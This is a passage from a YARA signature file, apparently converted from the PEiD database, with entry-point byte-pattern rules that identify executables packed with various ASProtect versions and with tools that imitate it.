03 DD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_vxx_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 90 E8 00 00 00 00 5D 81 ED D1 27 40 00 B9 15 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_ASProtect_Anorganix_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 90 90 90 90 90 90 5D 90 90 90 90 90 90 90 90 90 90 90 03 DD E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_23_SKE_build_0426_Beta_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 60 40 00 E8 01 00 00 00 C3 C3 0D 6C 65 3E 09 84 BB 91 89 38 D0 5A 1D 60 6D AF D5 51 2D A9 2F E1 62 D8 C1 5A 8D 6B 6E 94 A7 F9 1D 26 8C 8E FB 08 A8 7E 9D 3B 0C DF 14 5E 62 14 7D 78 D0 6E }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_2122_dll_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v123_RC4_build_0807_dll_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v12x_New_Strain_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? ?? ?? E8 01 ?? ?? ?? 
C3 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_23_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 E5 0B 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v11_BRS_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E9 ?? 05 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v_If_you_know_this_version_post_on_PEiD_board: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? 00 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 DD 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v12x_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 00 00 68 01 ?? ?? ?? C3 AA }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_V2X_DLL_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 ?? ?? 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ?? ?? ?? ?? 03 DD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v132: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 
01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v_If_you_know_this_version_post_on_PEiD_board_h2_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 C0 E9 ?? ?? FF FF ?? 1C ?? ?? 40 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_12_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? ?? ?? C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_23_Alexey_Solodovnikov_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 E5 0B 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v12_Alexey_Solodovnikov_h1_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 ?? 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v20_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? 40 00 E8 01 00 00 00 C3 C3 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 3B ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 
?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 2C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v123_RC4_build_0807_exe_Alexey_Solodovnikov_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_123_RC4_build_0807_exe_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v20: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? 40 00 E8 01 00 00 00 C3 C3 }\r\n        $b = { 68 01 ?? 40 00 E8 01 00 00 00 C3 C3 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 3B ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 
?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 2C }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASProtect_v12x_New_Strain: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? ?? ?? E8 01 ?? ?? ?? C3 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v11_BRS: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 }\r\n        $b = { 60 E9 ?? 05 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASProtect_123_RC4_build_0807_dll_Alexey_Solodovnikov_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_10_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 01 00 00 00 90 5D 81 ED ?? ?? ?? 00 BB ?? ?? ?? 00 03 DD 2B 9D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_21x_dll_Alexey_Solodovnikov_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 
80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_2122_exe_Alexey_Solodovnikov_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C 00 }\r\n        $b = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 
80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C }\r\n        $c = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASProtect_V2X_Registered_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? ?? ?? E8 01 00 00 00 C3 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_ASProtect: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 90 90 90 90 90 90 5D 90 90 90 90 90 90 90 90 90 90 90 03 DD E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v123_RC1_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 53 60 BD ?? ?? ?? ?? 8D 45 ?? 8D 5D ?? E8 ?? ?? ?? ?? 8D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_11_MTE_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E9 ?? ?? ?? ?? 91 78 79 79 79 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_2122_exe_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 
80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v123_RC4_build_0807_dll_Alexey_Solodovnikov_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n        $b = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASProtect_v_If_you_know_this_version_post_on_PEiD_board_h2: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? 00 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 DD 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n        $b = { 33 C0 E9 ?? ?? FF FF ?? 1C ?? ?? 40 }\r\n        $c = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? 
00 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 DD 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASProtect_SKE_21x_exe_Alexey_Solodovnikov_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_02_ASProtect: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 90 90 90 90 90 90 5D 90 90 90 90 90 90 90 90 90 90 90 03 DD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v21x: PEiD\r\n{\r\n    strings:\r\n        $a = { BB E9 60 9C FC BF B9 F3 AA 9D 61 C3 55 8B }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_123_RC4_build_0807_exe_Alexey_Solodovnikov_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 
80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_ASProtect_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 90 90 90 90 90 90 5D 90 90 90 90 90 90 90 90 90 90 90 03 DD E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_2122_dll_Alexey_Solodovnikov_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C 00 }\r\n        $b = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule AHTeam_EP_Protector_03_fake_ASProtect_10_FEUERRADER: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 
90 FF E0 60 E8 01 00 00 00 90 5D 81 ED 00 00 00 00 BB 00 00 00 00 03 DD 2B 9D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_2122_dll_Alexey_Solodovnikov_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v11_MTEb_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E9 ?? 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_133_21_Registered_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? ?? ?? E8 01 00 00 00 C3 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_20: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? 40 00 E8 01 00 00 00 C3 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_23_SKE_build_0426_Beta: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 60 40 00 E8 01 00 00 00 C3 C3 0D 6C 65 3E 09 84 BB 91 89 38 D0 5A 1D 60 6D AF D5 51 2D A9 2F E1 62 D8 C1 5A 8D 6B 6E 94 A7 F9 1D 26 8C 8E FB 08 A8 7E 9D 3B 0C DF 14 5E 62 14 7D 78 D0 6E }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v11_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 1B ?? ?? ?? E9 FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v11_MTEc: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 1B ?? ?? ?? E9 FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v11_MTEb: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 1B E9 }\r\n        $b = { 90 60 E9 ?? 
04 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASProtect_v123_RC4_build_0807_exe_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n        $b = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASProtect_20_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? 40 00 E8 01 00 00 00 C3 C3 }\r\n    condition:\r\n        $a at 